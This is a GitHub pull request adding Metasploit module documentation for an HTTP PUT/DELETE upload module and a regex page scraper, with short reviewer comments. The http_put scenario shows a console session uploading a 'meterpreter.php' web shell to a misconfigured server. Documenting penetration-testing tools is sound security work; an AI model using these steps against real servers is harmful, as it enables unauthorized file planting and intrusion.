Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Adding Http Modules Docs #11436

Merged
merged 4 commits into from Feb 19, 2019
Merged
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
59 changes: 59 additions & 0 deletions documentation/modules/auxiliary/scanner/http/http_put.md
@@ -0,0 +1,59 @@
## Description
This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests.

## Verification Steps

1. Do: ```use auxiliary/scanner/http/http_put```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```set PATH [PATH]```
5. Do: ```set FILENAME [FILNAME]```
6. Do: ```set FILEDATA [PATH]```
7. DO: ```run```

## Options
Yashvendra marked this conversation as resolved.
Show resolved Hide resolved

### ACTION

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Consider adding a line here:

Set `ACTION` to either `PUT` or `DELETE`. (default: `PUT`)

**PUT**

Action is set to PUT to upload files to the server. If `FILENAME` isn't specified, the module will generate a random string as a .txt file.

**DELETE**

Deletes the file specified in the `FILENAME` option. (default: `msf_http_put_test.txt`)

### PATH

The path at which this module will attempt to either PUT the content or DELETE it.

### FILEDATA

The file whose data is to be uploaded.

## Scenarios

Here Action is set to `PUT`.

```
msf > use auxiliary/scanner/http/http_put
msf auxiliary(scanner/http/http_put) > set ACTION PUT
ACTION => PUT
msf auxiliary(scanner/http/http_put) > set RHOSTS 1.1.1.23
RHOSTS => 1.1.1.23
msf auxiliary(scanner/http/http_put) > set RPORT 8585
RPORT => 8585
msf auxiliary(scanner/http/http_put) > set PATH /uploads
PATH => /uploads
msf auxiliary(scanner/http/http_put) > set FILENAME meterpreter.php
FILENAME => meterpreter.php
msf auxiliary(scanner/http/http_put) > set FILEDATA file://root/Desktop/meterpreter.php
FILEDATA => file://root/Desktop/meterpreter.php
msf auxiliary(scanner/http/http_put) > run

[+] File uploaded: http://1.1.1.23:8585/uploads/meterpreter.php
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/http_put) >
```

26 changes: 26 additions & 0 deletions documentation/modules/auxiliary/scanner/http/scraper.md
@@ -0,0 +1,26 @@
## Description
This module scrapes data from a specific web page based on a regular expression.

## Verification Steps

1. Do: ```use auxiliary/scanner/http/scraper```
2. Do: ```set RHOSTS [IP]```
3. Do: ```run```

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This is missing a ## Options section, where you'd mention the PATTERN and call out the default instead of putting it in the scenarios section.

## Scenarios
By default this module scrapes the `title` of a web page.

```
msf > use auxiliary/scanner/http/scraper
msf auxiliary(scanner/http/scraper) > set RHOSTS 1.1.1.18
RHOSTS => 1.1.1.18
msf auxiliary(scanner/http/scraper) > set PATTERN '<title>(.*)</title>'
PATTERN => (?-mix:<title>(.*)<\/title>)
msf auxiliary(scanner/http/scraper) > run

[+] 1.1.1.18 / [Index of /]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/scraper) >
```